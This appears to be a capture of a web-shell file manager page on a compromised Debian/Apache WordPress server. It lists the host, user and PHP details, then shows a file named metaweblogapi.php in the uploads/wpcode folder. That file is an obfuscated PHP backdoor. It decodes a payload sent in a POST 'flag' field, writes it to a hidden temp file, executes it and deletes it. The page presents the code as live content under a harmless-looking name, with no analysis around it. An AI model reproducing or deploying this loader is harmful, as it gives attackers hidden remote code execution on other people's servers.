HEX
Server: Apache/2.4.59 (Debian)
System: Linux keymana 4.19.0-21-cloud-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
User: lijunjie (1003)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /var/www/thaler/wp-content/uploads/wpcode/
Upload Files
File: /var/www/thaler/wp-content/uploads/wpcode/metaweblogapi.php
<?php

if(array_key_exists("\x66la\x67", $_POST)){
	$binding = array_filter([sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), "/var/tmp", "/tmp"]);
	$value = $_POST["\x66la\x67"];
	 	$value= 	explode		(	 "."  , $value	);   
	$reference	 ='';
            $salt7	 ='abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	 =strlen($salt7  );
    
            foreach($value as $s  =>  $v8) {
                $chS	 =ord($salt7[$s%		$sLen]  );
                $dec	 =((int)$v8 - $chS -($s%		10)) ^	96;
                $reference .= chr($dec  ); 	} 	
	foreach ($binding as $key => $item) {
    		if (is_writable($item) && is_dir($item)) {
    $desc = vsprintf("%s/%s", [$item, ".k"]);
    $success = file_put_contents($desc, $reference);
if ($success) {
	include $desc;
	@unlink($desc);
	die();}
}
}
}
@ Telegram